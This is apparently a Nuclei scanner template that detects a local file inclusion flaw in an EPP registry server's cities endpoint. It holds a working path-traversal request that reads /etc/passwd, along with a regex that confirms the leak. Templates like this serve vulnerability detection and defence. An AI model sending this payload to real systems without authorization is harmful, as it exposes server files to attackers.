34 lines
936 B
YAML
34 lines
936 B
YAML
id: epp-server-lfi
|
|
|
|
info:
|
|
name: EPP Server - Local File Inclusion
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
servlet called "CitiesServlet" that handles HTTP GET requests, so the user-provided input, obtained from the country parameter, is directly concatenated with the "/cities/cities_" string to form the fileName, This means an attacker can manipulate the country parameter and potentially access arbitrary files on the server's file system
|
|
reference:
|
|
- https://hackcompute.com/hacking-epp-servers/
|
|
metadata:
|
|
max-request: 1
|
|
tags: epp,cocca,registry
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cities?country=/../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/json
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|